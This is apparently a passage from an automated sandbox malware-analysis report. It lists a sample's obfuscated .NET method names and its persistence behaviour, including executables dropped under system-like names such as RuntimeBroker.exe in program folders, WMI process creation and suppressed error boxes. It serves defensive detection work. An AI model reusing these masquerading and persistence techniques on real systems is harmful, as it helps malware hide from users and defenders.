                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, TMISbINv5kpCJOH6S09.csHigh entropy of concatenated method names: 'VKhN2IfLqY', 'yHtLVpmPd7s8osZQHRUA', 'QpKYNHmPDwLwmdUL9ACB', 'QkfTtFmPfn6aa1KBNoAw', 'lSnQAImP7pth6KQwlNOc', 'mO1d0KmP5YHBEsjxSMff', 'wZao3SmPbpmx3iLyC36W', 'ekCVQZmPRgTrOfY9aaLn', 'zq9b0WmP60266Qwt1yyr'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, LrqnvPphML3I1uZSRRD.csHigh entropy of concatenated method names: 'kF7p5rjsrD', 'EnAp6PInTS', 'KNvPajmPlK84Uy43f7wV', 'Jl8H92mPHvvGZ9r4LvC9', 'OASbbHmPYEQLq9C9Gn8N', 'mEktermPEW7qWybdNGg7', 'N82pxwCl4k', 'vV7pB7vuSn', 'EA2pi8nicD', 'Ry6psibkR4'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, zdLEYycSqSs20sh3J9u.csHigh entropy of concatenated method names: 'Close', 'qL6', 'vWac4cAZ4l', 'ClKcLis3Kl', 'u21cATGtIY', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, WDZPbnTbaF1a3517ZQw.csHigh entropy of concatenated method names: 'csLmNYlBCtv', 'm7pTdqUu0R', 'gZjmNlwHslO', 'z7AEA2mhtHik9O0UWj9Y', 'cqwqD5mhGAlU3iN2UAXO', 'hXLyfYmh3rcGngIpw8hJ', 'udsqJkmhqEJZSCiaLQvY', 'Ugml9PmhM1Jo7FeXUwxZ', 'n05oOBmhKODS0poMDBEJ', 'gFd0wFmheV87GZ2hQRJf'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, OomxlwNqtbu61lvjvkH.csHigh entropy of concatenated method names: 'oALNGa6qsy', 'LB6NMV149i', 'KEPNK7inRi', 'wu3NeZxDVn', 'oArNcNeVwm', 'e9lNPedTvi', 'ncyomJmSa3SXZdhiTTso', 'dOSIComSFR0jFfNwBnVA', 'WdFWJ9mSyRjmAwu6XvoQ', 'NS1g0SmS0LKuAMykWGTk'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, aGOHMSnHemLOiyLxSQj.csHigh entropy of concatenated method names: 'x9wbVIm9nOHOrUOwHf1E', 'FJai6Mm9vmln5XTgqJxh', 'gxfR4Dm9w742Rd61k0py', 'LmEn4lm918CmwO9nhA1c', 'WMjWGpm9TKAjxLc2KXXW', 'method_0', 'method_1', 'jXBnlnHeNU', 'zk9nEQPb7n', 'AhSn17WRGO'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, w0DtNati4tM0E6uvEP2.csHigh entropy of concatenated method names: 'RqGtrHLgLu', 'MphtbRh3eA', 'G38tRRTX8N', 'VBkNMrmsjk2ZoJgK8d74', 'QXZTiJmsPGSdbUGfBnL6', 'rfNKhomsSEMhSZYsBgsX', 'ot1fmXms4ADtGs6nUCaQ', 'lFv8wKmsLdfTbADi77q2', 'xmP5u4msARf8jy6uBG8h', 'dpLowDms8tjPQKZ2fCXv'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, NgJJ0b3KU1esQKRMrBO.csHigh entropy of concatenated method names: 'method_0', 'FC93cAWNTc', 'IUP3PDfNYD', 'vi23SMrC1O', 'FbJ3jGALUf', 'F9c34Nx9t6', 'zGF3LdX2KH', 'vqisNfmi1k5Pp73BHBfn', 'OY2L9QmiTllnSI6p6dkf', 'BDfk5Amin2whftMfsm4L'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, TtYDK93JJJqlwJP0oBp.csHigh entropy of concatenated method names: 'ttH3WUQudk', 'QfZ3gCel6L', 'ulm3ur391c', 'UKn3HWOsDJ', 'DT43YKtHv0', 'A7GvAcmiJrKwULs7wRTA', 'knJkPCmiOqCnxJ4HgPi5', 'R9MCy2miXEoPU2dwVNRU', 'oK5j9OmiQZ8lsnsHAIxw', 'VDsPMdmiWuHCcZ6avHHp'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, ke0OuscRUTbT7jhpRds.csHigh entropy of concatenated method names: 'NTacDF0xXy', 'k6r', 'ueK', 'QH3', 'ugDcfRTKGX', 'Flush', 'poXc7liDmB', 'Csjc5Y1PJr', 'Write', 'OrCc664RVG'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, FTuy0EA6vB7LbeNXJw6.csHigh entropy of concatenated method names: 'l1fAkdVnkg', 'K35AVCjVy1', 'AitAzyqpcs', 's9a8oV4F8y', 'eMU8mIhKpe', 'XKw8ac3KXJ', 'w7t8F6KsUH', 'f1q8yTSeWI', 'BKX80NlIKn', 'Ch08ZDRUwn'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, ab8YqkzeXNQ3NHZ0LH.csHigh entropy of concatenated method names: 'yGrmmH4YU1', 'zKumFUmAWD', 'SoFmyDgWZT', 'lcVm0fGRQJ', 'j3WmZ19YFv', 'z5PmpUP2u9', 'KQpmOIuQ1H', 'aS2iXwmqJMEhrWi3nVDW', 'IFfalPmqQVfRp5KA3Pms', 'mM0kUkmqWZdeGgfgPTRr'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, tyBfq91fevio74viZZJ.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'd9kmNWf1f3o', 'yE8myijbKpL', 'f0iZnVm821y7Rf6gRLLu', 'TwfWmWm8IXR3mUH6mohp', 'dAeajrm8U8SyoC1xxMBY', 'lubtsOm83vX6Ke37omIA', 'puqKqWm8qIiZANj5mYuT'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, xx38kINX4euRCFnwFrY.csHigh entropy of concatenated method names: 'QURNQFY4xq', 'w0nNWEfAko', 'R6ENgRs85y', 'INK8HfmPKqaVk2ow7CDi', 'caMbixmPepWieueMRqy3', 'MXO3dsmPG5IlupTyJ7DN', 'S1bnUAmPMTxVN0SKaMyG', 'EwZGwxmPcRuL41XFcIeD', 'QaRmtSmPPJJp1qaZ6kJp', 'UTojhnmPSCmpwLjsd6gL'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, XkhCeBpmbnDc9syvjQT.csHigh entropy of concatenated method names: 'PtOpFk3kRT', 'QuVpyrmlZb', 'YP1p0chjEv', 'l6v502mcWAemUujTIVBE', 'VYalksmcgk8xCsYrUK0L', 'hYE0PKmcuDEwVnG0OJco', 'K1Ze79mcHQDMDmLCvjXc', 'pw8IO1mcYr2Q9XiRRMsh', 'm5Q0RMmclyKUYoWf1gjd', 'aPd0FSmcEka94olshDUF'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, uQf0WVjSFkNjHR2olmi.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'WFrS3vmDc0KSMF474HeG', 'GAGbULmDKiPjR3qD5WyC', 'B3vAvZmDevtTsvFeWpbU'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, JYgOeyF3FYChwXSgXtV.csHigh entropy of concatenated method names: 'kHqF91rNTK', 'MvAFxIm4aT', 'HRwFBcbmmN', 'K4LoskmGdHFbdxCSRk4A', 'gxdULFmGDohl7vllaOE6', 'sHZQIcmGboxSAn89S8Fu', 'Hb0C2EmGRLpbfvuaAL6i', 'TduFtbL6Gm', 'iNHFGxZ7yM', 'l4CFM1062X'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, DDB9n5fKhZ4gPgg7GjH.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'qGKfcpQgKc', 'jk6Teom5xDGNT0o71hu4', 'pWdNmkm5BvX04eq2CgAd', 'qRm80Gm5i9uU8MYGga5A', 'GDqfUnm5sio2o70w3LY4', 'VlV10sm5rslRNxAGu3yd', 'vfV4Z6m5brR1G6KqeWTh'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, LFS44WGWpoUnrVLP67E.csHigh entropy of concatenated method names: 'mkXGuOgmaO', 'adoTgdmrNNiQHKohTth6', 'MZY7XTmrZuu1S3u8J6WN', 'bIMPgEmrp7EyCRKEHC4W', 'AyJ3UKmrOv7LMYBylNGQ', 'EZTcFumrXtJ3eTlMdk97', 'mbhlj5mrJLDXiMVJaPMQ', 'RNAb8ImrQdnmSnmRVns1'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, d2HC74lBHe6hcVu0nK.csHigh entropy of concatenated method names: 'GmyPnwxhA', 'HsF4tdm3cxo9IV315wWR', 'hPBD8Pm3PLB0EAOVNUOG', 'BAZGgUm3KXwBCWn5L7qF', 'IXjk1gm3e5pjPGc3fAhN', 'RyV14ukRb', 'rfZTanWex', 'xTxnY5cHH', 'yCJvc96nX', 'XR1wV7JWb'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, dWtQ9V6o76jQMSLmNos.csHigh entropy of concatenated method names: 'Isq6ySIB6N', 'scU60VnqhI', 'MR2j4umCRNoLFGMQPcya', 'D5dnmxmCdBmswxYw81wT', 'xn24klmCD0iW3E8ZXEYk', 'SHbBPjmCfosdv3SVFekK', 'BHwhC8mC7Su6dJrthb2x', 'u8l6aaOcPE', 'AfK5nHmCsmO5vOfihU9U', 'jdqCYDmCBvNaa6Qsbvj0'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, Lu40BD0xJcCFHcVnd5o.csHigh entropy of concatenated method names: 'HHU0b2ohjq', 'UTx5i7meO3BKnD6tgFSS', 'KosmxGmeXbmHORCOdFPm', 'CN7R89meJOsnITJXjlps', 'U1J', 'P9X', 'c2fmyH43EtF', 'aZNmyYBeu9B', 'w38mNpHYVHp', 'imethod_0'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, ATteJryUsK6cTsRSZ32.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'gEfmNFjc2eP', 'gpxmymY15FW', 'p1xVIomMejOPxBuasu4w', 'a4qThTmMcC3W8p6YWL03', 'GMhdBJmMP3WEAZm5Lf6F'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, Mydq122XJ0uN8Y6DgQX.csHigh entropy of concatenated method names: 'ImL2KbDcnj', 'cZI2QDfNhc', 'Bob2WuLMrK', 'D3H2g1H7Eh', 'o7R2u1mCv4', 'tX62HpFtOw', 'fT92YeQAHA', 'kMS2lJ5kAq', 'l4T2Eprmww', 'ohL21DAdG2'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, Hjm1OP2dxPmaZqCdOIu.csHigh entropy of concatenated method names: 'oyZ2fOrnie', 'iG427m3v3W', 'WNg25WopTp', 'OsZ26rOSAh', 'cYC2Cx1wTF', 'QZeWKEmx7q48VBV1wfHL', 'Lhe0A8mxD6T0BBQYDDgT', 'Wiw1xmmxfRFbLRPUGg54', 'Gjwlf6mx5W1OSiSQONKd', 'iBQYn7mx6Tr7csZj2ous'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, pk76y2aT65gfZiL7Prh.csHigh entropy of concatenated method names: 'kXEavNhlcd', 'O67awYW8uK', 'MgljssmtGcdSsIbrFk0M', 'rjxp3vmtqSxSbQy7xhRx', 'Y5fN14mttAmuZLfVVm2g', 'iHI2YymtMHysItjFPWQk', 'Lv5rg3mtKwFPXAFO6qq7', 'yPJKVgmtec47uaNaDKHF', 'y5g3mfmtcEeUQxn4iECS'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, xPFLp90ACtJgE0H4jf1.csHigh entropy of concatenated method names: 'q64', 'P9X', 'ET0mygGsQF7', 'vmethod_0', 'zqImNZ1OLFc', 'imethod_0', 'EO3a2PmKC7jskZKKtFyE', 'oa6tcQmKkDWJ8kwFdyMW', 'ASRHeLmKVE6DwpkWnNdX', 'yCe0bFmKzlQi7D5a4OW9'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, Ph7E2syA0El3co9JZ2O.csHigh entropy of concatenated method names: 'bTRyk3vc8t', 'cqCr1AmKQJPp3WBaqipB', 'g6cJKOmKWjthZBR6NI6M', 'xLXlWOmKXOCcfI1f98XI', 'XW6xRSmKJS8Z9qw1Cvts', 'HtrcotmKYHIjAdThKwYv', 'WBLUHrmKupwUVWKEOMAl', 'Un0FskmKHkn9dWouhM7i', 'GD81O9mKlNTmcXgPRIV7', 'ewT0ZTOBWZ'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, K1sDbeLOZw07ixJB452.csHigh entropy of concatenated method names: 'v9lLIFvnO1', 'vK3l0ZmflNSGsbYEu439', 'LvBYLqmfHoe8nbhr6QIl', 'WVq9FNmfYKxBagI8Mn5O', 'dmGG37mfEH6qG5a2DSmn', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, Q2nAFB0dhSnVRYIjTqJ.csHigh entropy of concatenated method names: 'iCY0CNPZB5', 'dQV0kYHEeO', 'tHi0VON5kJ', 'T2L0z7BCyp', 'doNZo9Sw2u', 'iEVZmso9JG', 'NIcZa3R1dG', 't9nJ7Fme1Akxbmt56f1A', 'iIpHs7meTJCZxxIr1bZV', 'A1jdxdmelvjMmRHqcqRC'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, LOfbynen17tP21hZjVm.csHigh entropy of concatenated method names: 'XqLcgkyLMU', 'qFKP62mRRukVXFYMvRRT', 'Xa3nFBmRrveRMeMI93Gw', 'JhJy9jmRbK8UPx3bjPsS', 'kWtBypmRdKbrlrnH5Mbj', 'kt5', 'eUeewliXaF', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, gcqP8APREPE1WvYgFF9.csHigh entropy of concatenated method names: 'FJtaB0mDpKgCiqqYoQjS', 'FUX1KxmD0vQkasHv7Wyk', 'sgpC9AmDZriiKvWXDpZJ', 'D7n598mDNO0RnhyUgvK9', 'ilfPDTRmp1', 'Mh9', 'method_0', 'cIfPfDn2T0', 'Dg3P7tVtOs', 'j6NP5YY6ZL'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, Jv4Vh1IxQNTkinSF4H1.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'sqsIiJcB8d', 'KhPIspA3LJ', 'Dispose', 'D31', 'wNK'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, stJJueMVgIKtB8L5SvO.csHigh entropy of concatenated method names: 'efxKoyIDcJ', 'aJyKmo6tua', 'Yd7', 'LZBKa63n5y', 'indKFIRaHG', 'cptKy9T5mH', 'wJgK0Sd96o', 'zA2kD9mbC2TjrsCPvCF4', 'aLHVT2mb5uy9weEGld0K', 'FHsBc9mb61IlW2Uyxd2N'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, NF4DxjAKTYPeDFgZSSU.csHigh entropy of concatenated method names: 'jyQAcIrSBE', 'zAQAP3n031', 'zfNAS42LFa', 'YccAjhmLyg', 'RyRA4In8Hs', 'D8oALX0A5K', 'DnYAAv06FW', 'pxIA8pWKs5', 'S6fAh9Pqhc', 'IqiA9r4uFq'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, Ej7lweaRL3K6o0pj3Vp.csHigh entropy of concatenated method names: 'TKqFpgy5hI', 'XBOF7QmGFVo5YqA8g4uJ', 'mGIAJWmGyjDy9yW2uUV8', 'YZOs6JmG0WTHLRRLsNaE', 'g1JK1jmGZQRmrtC2QHkM', 'tboFxgmGmgaKLybYEsay', 'olOFPGmGaHo29ubsGc82', 'QILeoqmGpEf0dulK7PXb', 'eOQA6OmGN1jrvXsMS9sF', 'AsrFos2b0u'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, WSgPqMZI3SDivoeH4jk.csHigh entropy of concatenated method names: 'IHEZKyn8fI', 'of2u4FmeBZbTqSBjUnWY', 'LPpFR8me9DMlwjYly1sO', 'sD78t6mexgegOnB0XG8n', 'f2DPcMmeireQ0yuuP3cK', 'WclSLameseU4u6N1aDg3', 'E94', 'P9X', 'vmethod_0', 'Ga5myTeIe7p'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, muXnpA6lFel6HrDvFg0.csHigh entropy of concatenated method names: 'LYHCebmkQrl7E5UTkDia', 'XP4GZQmkWwuWkjv9hmtR', 'S14CfMmgp7', 'VVRrExmkYcub0Dr7H8r4', 'gmNl4Imkl2KgWXegxcTh', 'A2TXc7mkEZ0Sf9yZVRrG', 'YB9sDWmk1XRgqo2l0vcv', 'Lj8UyEmkTqTXOoVvbx93', 'c8Ea45mkndmXykWOmFC2', 'sCE0Qqmkvc9l4A38wegW'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, pJVNrSa0q7vP9SOWgDt.csHigh entropy of concatenated method names: 'wwFapgpHZh', 'yhhaNcrHKH', 'NJcaOVnyAm', 'kNuaXqfDH0', 'NkQh5KmtHGNw47xPU1rW', 'qW6cQjmtgCub2ng7gq6f', 'cINhfWmtuWiY6xYt9OVB', 'wQchZWmtYhvHZ0aXMtRm', 'iflWdSmtluv7ngOOYNTJ', 'nwwdEkmtEEI2hyGVPuZX'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, UREhymqh2rnbPsF8SGj.csHigh entropy of concatenated method names: 'NoeqkYqGqO', 'oTZqzuvv4w', 'lB5qxthoCU', 'GboqBnXltE', 'VreqiBCVf2', 'ldSqsDmnQF', 'PhNqrGtDK7', 'lX5qbn3e60', 'PkiqR9sf2n', 'H82qdURirW'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, xJ20a4ZhaJlZ6KqcbX3.csHigh entropy of concatenated method names: 'kF2Z5cwkAr', 'NHCZ6IiD0j', 'BUrZCGjYFs', 'FZhYtbmcXGS91yUj0Hgu', 'kBMhBkmcJsKv4sjMe625', 'rONsTAmcNSgjlfqaQC71', 'h3qnI8mcOwaTjRltOghP', 'pVPZxYFDNI', 't7bZBaCFxR', 'JmKZiaWCrc'
                                Source: 1.3.f5Mb10zb.exe.65e7104.0.raw.unpack, DOM9BRtDs274yLr5FGi.csHigh entropy of concatenated method names: 'aA3t7Wt5fQ', 'D24t5ps7EU', 'Uf3t6W6LlQ', 'sL3tCZtHvp', 'mIqtkGiBoo', 'cZrRufms9DAx9atA627A', 'qMVImYmsxDGZ0pR7WSZS', 'DvMvUDmsBc4Z1YbThaMy', 'uVGaUbmsiSWohwMaTUZ2', 'O3gJfumssKDp7PPfLYdU'

                                Persistence and Installation Behavior

                                Source: C:\mshypercomponentSavesdll\agentFont.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File written: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe
                                Source: unknown Executable created and started: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File created: C:\Users\user\Desktop\kZFyeAfm.log
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe File created: C:\mshypercomponentSavesdll\agentFont.exe
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\mf04Loader.dll
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File created: C:\Users\user\Desktop\cvxIvGPF.log
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File created: C:\Windows\INF\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File created: C:\Users\user\Desktop\HhjUFBqv.log
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File created: C:\Users\user\Desktop\HOfmkikL.log
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File created: C:\Users\user\Desktop\rEqPmwUs.log
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File created: C:\Program Files\Adobe\Acrobat DC\Resource\RuntimeBroker.exe
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File created: C:\Program Files (x86)\Microsoft.NET\RuntimeBroker.exe
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File created: C:\mshypercomponentSavesdll\DONEBnCAFZiOynZWpVVmZLvNQeA.exe
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File created: C:\Users\user\Desktop\AnJfWYZZ.log
                                Source: C:\mshypercomponentSavesdll\agentFont.exe File created: C:\Recovery\ApplicationFrameHost.exe

                                Hooking and other Techniques for Hiding and Protection

                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\Desktop\QH67JSdZWl.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cNeeds\cData\o4e4cli\f5Mb10zb.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\mshypercomponentSavesdll\agentFont.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
